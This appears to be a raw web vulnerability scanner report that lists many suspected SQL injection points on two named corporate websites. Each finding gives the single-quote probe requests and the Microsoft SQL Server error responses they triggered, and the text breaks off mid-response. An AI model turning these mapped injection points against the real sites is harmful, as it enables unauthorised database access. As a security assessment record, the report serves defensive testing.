The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /pr_prlist'/PR120910_IPTV.htm HTTP/1.1
Host: www.pyr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:09:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /pr_prlist''/PR120910_IPTV.htm HTTP/1.1
Host: www.pyr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:09:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/rp_Can-Vod-Save-IPTV.htm HTTP/1.1
Host: www.pyr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:08:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 343
Content-Type: text/html
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near the keyword 'Save'.</font> ...[SNIP]...
Request 2
GET /store''/rp_Can-Vod-Save-IPTV.htm HTTP/1.1
Host: www.pyr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:08:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/rp_Global-Mobile-Capex-Index.htm HTTP/1.1
Host: www.pyr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:09:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 344
Content-Type: text/html
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near the keyword 'Index'.</font> ...[SNIP]...
Request 2
GET /store''/rp_Global-Mobile-Capex-Index.htm HTTP/1.1
Host: www.pyr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:09:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /myaccount'/register.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=AKMKIDJBABFALIMCHCJOHMOP; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /myaccount''/register.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=HKMKIDJBKGANDLDNAPNDMHGM; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /points'/item/101209.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=CDNKIDJBBJOELBDMNDNDMLKN; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /points''/item/101209.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=DDNKIDJBMPHLDOFFCPGPGNHP; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /points/item'/101209.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=KDNKIDJBAOBEGIEMGJCNDCAO; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /points/item''/101209.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=LDNKIDJBAMNNOHHEKPPEBKOJ; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /points'/item/111810.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=GENKIDJBHLGKOIPBOKFMPMHH; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /points''/item/111810.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=HENKIDJBMEPJLEKNAKJMOMBM; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /points/item'/111810.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=KENKIDJBDHKBNDLAFCLEHLJE; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /points/item''/111810.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=LENKIDJBHPHPIDCANLHNFDBK; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /points'/item/120110.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=FDNKIDJBOFFMKBFMOLEIKFFG; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /points''/item/120110.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=GDNKIDJBOMPAGPAMGMMKIKFI; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /points/item'/120110.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=ODNKIDJBGCBNNDMELKIAAOEI; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /points/item''/120110.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=PDNKIDJBCIGCGIOHNKFHOLNH; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/CIRGUATEMALA.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=FLMKIDJBIHICDKCBAPGOGKMA; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/CIRGUATEMALA.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=ILMKIDJBBDPMKJBNMFKEIFNN; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/CIRISRAEL.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=LIMKIDJBHNOPJJDIHOOKMNAJ; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/CIRISRAEL.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=NIMKIDJBGEBBAJNGJPDAFBMN; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/CIRPANAMA.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=NGMKIDJBBLHENDIHCMKHAHFK; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/CIRPANAMA.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=AHMKIDJBGEHIELFNLMPGAHBO; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/CIRSAUDIARABIA.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=IHMKIDJBDCEOIFKONOMDAGNL; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/CIRSAUDIARABIA.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=JHMKIDJBGDCAPKKPONJJFDKN; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/CIRVIETNAM.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=PJMKIDJBNLMCIFEOMCEKJAJC; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/CIRVIETNAM.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=FKMKIDJBOJDOOFAHNFCPMPPM; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/PREPMNGDSERV.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=DFLKIDJBFHBBOCNPNLDKPNCA; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/PREPMNGDSERV.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
